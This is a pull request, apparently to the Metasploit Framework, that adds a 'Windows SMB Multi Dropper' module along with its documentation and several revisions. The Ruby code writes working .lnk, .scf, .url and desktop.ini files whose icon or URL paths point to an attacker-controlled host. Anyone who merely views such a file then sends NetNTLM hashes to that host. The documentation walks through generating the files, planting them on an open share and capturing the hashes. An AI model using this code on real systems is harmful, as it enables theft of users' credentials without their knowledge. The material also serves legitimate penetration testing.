### PR TITLE
Add New Module - Multidrop

### DIFF
--- a/documentation/modules/auxiliary/multidrop.md
+++ b/documentation/modules/auxiliary/multidrop.md
@@ -52,7 +52,7 @@ This can be changed using set LHOST 192.168.1.25
        Rank: Normal
 
 Provided by:
-  Richard Davy - secureyourit.co.uk
+  Richard Davy - secureyourit.co.uk, Lnk Creation Code by Mubix
 
 Basic options:
   Name      Current Setting  Required  Description
@@ -64,7 +64,12 @@ Description:
   This module dependent on the given filename extension creates either 
   a .lnk, .scf, .url, desktop.ini file which includes a reference to 
   the the specified remote host, causing SMB connections to be 
-  initiated from any user that views the file.
+  initiated from any user that views the file. Lnk file creation code 
+  taken from module droplnk.rb by Mubix
+
+References:
+  https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018
+  https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/
 
 msf auxiliary(multidrop) > exploit
 

--- a/documentation/modules/auxiliary/multidrop.md
+++ b/documentation/modules/auxiliary/multidrop.md
@@ -19,25 +19,26 @@ Microsoft Windows
 
 ## Options
 
-FILENAME - This option allows you to customise the generated filename and filetpye that is generated.
-This can be changed using set FILENAME
+**FILENAME**
+This option allows you to customise the generated filename and filetpye that is generated.
 
 To generate desktop.ini configure a filename of desktop.ini
 To generate a scf file configure a filename of anyname.scf
 To generate a url file configure a filename of anyname.url
 To generate a lnk file configure a filename of anyname.lnk
 
-File type generation is based on the file extension.
+Filetype generation is based on the file extension.
 
-LHOST - This option allows you to set the IP address of the SMB Listener that the document points to
+**LHOST**
+This option allows you to set the IP address of the SMB Listener that the document points to
 This can be changed using set LHOST 192.168.1.25
+
 
 ## Scenarios
 
-### Version of software and OS as applicable
+### Microsoft Windows
 
-  Microsoft Windows
-
+  
   ```
   Console output
   ```

--- a/documentation/modules/auxiliary/multidrop.md
+++ b/documentation/modules/auxiliary/multidrop.md
@@ -1,0 +1,92 @@
+This module dependent on the given filename extension creates either a .lnk, .scf, .url, desktop.ini file which includes a reference to 
+the the specified remote host, causing SMB connections to be initiated from any user that views the file. This allows for NetNTLM hashes to be captured
+by a listening user.
+
+## Vulnerable Application
+
+Microsoft Windows
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/multidrop```
+  4. Customise Options as required
+  5. Do: ```run```
+  6. A file pointing back to the listening host will then be generated.
+  7. Configure auxiliary/server/capture/smb or similar to capture hashes.
+  8. Upload the document to an open share or similar and wait for hashes.
+
+## Options
+
+FILENAME - This option allows you to customise the generated filename and filetpye that is generated.
+This can be changed using set FILENAME
+
+To generate desktop.ini configure a filename of desktop.ini
+To generate a scf file configure a filename of anyname.scf
+To generate a url file configure a filename of anyname.url
+To generate a lnk file configure a filename of anyname.lnk
+
+File type generation is based on the file extension.
+
+LHOST - This option allows you to set the IP address of the SMB Listener that the document points to
+This can be changed using set LHOST 192.168.1.25
+
+## Scenarios
+
+### Version of software and OS as applicable
+
+  Microsoft Windows
+
+  ```
+  Console output
+  ```
+
+  ```
+  msf auxiliary(multidrop) > show info
+
+       Name: Windows SMB Multi Dropper
+     Module: auxiliary/multidrop
+    License: Metasploit Framework License (BSD)
+       Rank: Normal
+
+Provided by:
+  Richard Davy - secureyourit.co.uk
+
+Basic options:
+  Name      Current Setting  Required  Description
+  ----      ---------------  --------  -----------
+  FILENAME  desktop.ini      yes       Filename - supports .lnk, .scf, .url, desktop.ini
+  LHOST     192.168.1.19     yes       Host listening for incoming SMB/WebDAV traffic
+
+Description:
+  This module dependent on the given filename extension creates either 
+  a .lnk, .scf, .url, desktop.ini file which includes a reference to 
+  the the specified remote host, causing SMB connections to be 
+  initiated from any user that views the file.
+
+msf auxiliary(multidrop) > exploit
+
+[+] desktop.ini stored at /root/.msf4/local/desktop.ini
+[] Auxiliary module execution completed
+msf auxiliary(multidrop) > set filename test.lnk
+filename => test.lnk
+msf auxiliary(multidrop) > exploit
+
+[+] test.lnk stored at /root/.msf4/local/test.lnk
+[] Auxiliary module execution completed
+msf auxiliary(multidrop) > set filename test.scf
+filename => test.scf
+msf auxiliary(multidrop) > exploit
+
+[+] test.scf stored at /root/.msf4/local/test.scf
+[] Auxiliary module execution completed
+msf auxiliary(multidrop) > set filename test.url
+filename => test.url
+msf auxiliary(multidrop) > exploit
+
+[+] test.url stored at /root/.msf4/local/test.url
+[] Auxiliary module execution completed
+msf auxiliary(multidrop) > back
+ 
+  ```

--- a/documentation/modules/auxiliary/multidrop.md
+++ b/documentation/modules/auxiliary/multidrop.md
@@ -52,24 +52,25 @@ This can be changed using set LHOST 192.168.1.25
        Rank: Normal
 
 Provided by:
-  Richard Davy - secureyourit.co.uk, Lnk Creation Code by Mubix
+  Richard Davy - secureyourit.co.uk
+  Lnk Creation Code by Mubix
 
 Basic options:
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
-  FILENAME  desktop.ini      yes       Filename - supports .lnk, .scf, .url, desktop.ini
+  FILENAME  test.url         yes       Filename - supports .lnk, .scf, .url, desktop.ini
   LHOST     192.168.1.19     yes       Host listening for incoming SMB/WebDAV traffic
 
 Description:
   This module dependent on the given filename extension creates either 
   a .lnk, .scf, .url, desktop.ini file which includes a reference to 
   the the specified remote host, causing SMB connections to be 
-  initiated from any user that views the file. Lnk file creation code 
-  taken from module droplnk.rb by Mubix
+  initiated from any user that views the file.
 
 References:
   https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018
   https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/
+
 
 msf auxiliary(multidrop) > exploit
 

--- a/modules/auxiliary/multidrop.rb
+++ b/modules/auxiliary/multidrop.rb
@@ -16,11 +16,13 @@ class MetasploitModule < Msf::Auxiliary
           a .lnk, .scf, .url, desktop.ini file which includes a reference
           to the the specified remote host, causing SMB connections to be initiated
           from any user that views the file.
-
-          Lnk file creation code taken from module droplnk.rb by Mubix
         },
         'License'       => MSF_LICENSE,
-        'Author'        => [ 'Richard Davy - secureyourit.co.uk, Lnk Creation Code by Mubix' ],
+        'Author'        =>
+            [
+              'Richard Davy - secureyourit.co.uk',  #Module written by Richard Davy
+              'Lnk Creation Code by Mubix'          #Lnk Creation Code written by Mubix
+            ],
         'Platform'      => [ 'win' ],
         'References'    =>
         [

--- a/modules/auxiliary/multidrop.rb
+++ b/modules/auxiliary/multidrop.rb
@@ -1,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/auxiliary/report'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Windows SMB Multi Dropper',
+        'Description'   => %q{
+          This module dependent on the given filename extension creates either
+          a .lnk, .scf, .url, desktop.ini file which includes a reference
+          to the the specified remote host, causing SMB connections to be initiated
+          from any user that views the file.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Richard Davy - secureyourit.co.uk' ],
+        'Platform'      => [ 'win' ],
+
+      ))
+    register_options(
+      [
+        OptAddress.new("LHOST", [ true, "Host listening for incoming SMB/WebDAV traffic", nil]),
+        OptString.new("FILENAME", [ true, "Filename - supports *.lnk, *.scf, *.url, desktop.ini", "word.lnk"]),
+
+      ])
+  end
+
+  def run
+    if datastore['FILENAME'].chars.last(3).join=="lnk"
+        createlnk()
+    elsif datastore['FILENAME'].chars.last(3).join=="scf"
+        createscf()
+    elsif datastore['FILENAME']=="desktop.ini"
+        create_desktopini()
+    elsif datastore['FILENAME'].chars.last(3).join=="url"
+        create_url()
+    end
+
+  end
+
+
+  def createlnk()
+    #Code below taken from module written by Mubix
+    lnk = ""
+    lnk << "\x4c\x00\x00\x00"                  #Header size
+    lnk << "\x01\x14\x02\x00\x00\x00\x00\x00"  #Link CLSID
+    lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"
+    lnk << "\xdb\x00\x00\x00"                  #Link flags
+    lnk << "\x20\x00\x00\x00"                  #File attributes
+    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  #Creation time
+    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  #Access time
+    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  #Write time
+    lnk << "\x00\x00\x00\x00"                  #File size
+    lnk << "\x00\x00\x00\x00"                  #Icon index
+    lnk << "\x01\x00\x00\x00"                  #Show command
+    lnk << "\x00\x00"                          #Hotkey
+    lnk << "\x00\x00"                          #Reserved
+    lnk << "\x00\x00\x00\x00"                  #Reserved
+    lnk << "\x00\x00\x00\x00"                  #Reserved
+    lnk << "\x7b\x00"                          #IDListSize
+    #sIDList
+    lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"
+    lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"
+    lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"
+    lnk << "C:\\"
+    lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"
+    lnk << "\x00"
+    lnk << "AUTOEXEC.BAT"
+    lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"
+    lnk << "\x5b\x15\x14\x00\x00\x00"
+    lnk << Rex::Text.to_unicode("AUTOEXEC.BAT")
+    lnk << "\x00\x00\x1c\x00\x00\x00"
+    #sLinkInfo
+    lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"
+    lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"
+    lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"
+    lnk << "\x00\x00\x00"
+    lnk << "C:\\AUTOEXEC.BAT"
+    lnk << "\x00\x00\x0e\x00"
+    #RELATIVE_PATH
+    lnk << Rex::Text.to_unicode(".\\AUTOEXEC.BAT")
+    lnk << "\x03\x00"
+    #WORKING_DIR
+    lnk << Rex::Text.to_unicode("C:\\")
+    #ICON LOCATION
+    lnk << "\x1c\x00"
+    lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\icon.ico")
+    lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"
+    lnk << "computer"
+    lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
+    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
+    lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
+    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
+    lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"
+
+    file_create(lnk)
+  end
+
+  def createscf()
+    scf=""
+    scf << "[Shell]\n"
+    scf << "Command=2\n"
+    scf << "IconFile=\\\\"+datastore['LHOST']+"\\test.ico\n"
+    scf << "[Taskbar]\n"
+    scf << "Command=ToggleDesktop"
+
+    file_create(scf)
+  end
+
+  def create_desktopini()
+    ini=""
+    ini << "[.ShellClassInfo]\n"
+    ini << "IconFile=\\\\"+datastore['LHOST']+"\\icon.ico\n"
+    ini << "IconIndex=1337"
+
+    file_create(ini)
+
+  end
+
+  def create_url()
+    url=""
+    url << "[InternetShortcut]\n"
+    url << "URL=file://"+datastore['LHOST']+"/url.html"
+
+    file_create(url)
+  end
+
+end

--- a/modules/auxiliary/multidrop.rb
+++ b/modules/auxiliary/multidrop.rb
@@ -16,10 +16,17 @@ class MetasploitModule < Msf::Auxiliary
           a .lnk, .scf, .url, desktop.ini file which includes a reference
           to the the specified remote host, causing SMB connections to be initiated
           from any user that views the file.
+
+          Lnk file creation code taken from module droplnk.rb by Mubix
         },
         'License'       => MSF_LICENSE,
-        'Author'        => [ 'Richard Davy - secureyourit.co.uk' ],
+        'Author'        => [ 'Richard Davy - secureyourit.co.uk, Lnk Creation Code by Mubix' ],
         'Platform'      => [ 'win' ],
+        'References'    =>
+        [
+          ['URL', 'https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018'],
+          ['URL', 'https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/']
+        ]
 
       ))
     register_options(
@@ -32,20 +39,20 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     if datastore['FILENAME'].chars.last(3).join=="lnk"
-        createlnk()
+        createlnk
     elsif datastore['FILENAME'].chars.last(3).join=="scf"
-        createscf()
+        createscf
     elsif datastore['FILENAME']=="desktop.ini"
-        create_desktopini()
+        create_desktopini
     elsif datastore['FILENAME'].chars.last(3).join=="url"
-        create_url()
+        create_url
     end
 
   end
 
 
-  def createlnk()
-    #Code below taken from module written by Mubix
+  def createlnk
+    #Code below taken from module droplnk.rb written by Mubix
     lnk = ""
     lnk << "\x4c\x00\x00\x00"                  #Header size
     lnk << "\x01\x14\x02\x00\x00\x00\x00\x00"  #Link CLSID
@@ -102,31 +109,31 @@ class MetasploitModule < Msf::Auxiliary
     file_create(lnk)
   end
 
-  def createscf()
+  def createscf
     scf=""
     scf << "[Shell]\n"
     scf << "Command=2\n"
-    scf << "IconFile=\\\\"+datastore['LHOST']+"\\test.ico\n"
+    scf << "IconFile=\\\\#{datastore['LHOST']}\\test.ico\n"
     scf << "[Taskbar]\n"
     scf << "Command=ToggleDesktop"
 
     file_create(scf)
   end
 
-  def create_desktopini()
+  def create_desktopini
     ini=""
     ini << "[.ShellClassInfo]\n"
-    ini << "IconFile=\\\\"+datastore['LHOST']+"\\icon.ico\n"
+    ini << "IconFile=\\\\#{datastore['LHOST']}\\icon.ico\n"
     ini << "IconIndex=1337"
 
     file_create(ini)
 
   end
 
-  def create_url()
+  def create_url
     url=""
     url << "[InternetShortcut]\n"
-    url << "URL=file://"+datastore['LHOST']+"/url.html"
+    url << "URL=file://#{datastore['LHOST']}/url.html"
 
     file_create(url)
   end


### PR DESCRIPTION
Multidrop is a single module which can be used to create *.scf, *.url, *.lnk and desktop.ini files which contain a SMB/UNC link to a listener ready to capture NetNTLM hashes

![image_proof](https://user-images.githubusercontent.com/29480277/40944235-ec55ffac-684b-11e8-9814-3d23a74cd57d.JPG)

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use auxiliary/multidrop`
- [x] `SET LHOST`
- [x] `SET FILENAME`
- [x] `exploit`


@bcoles 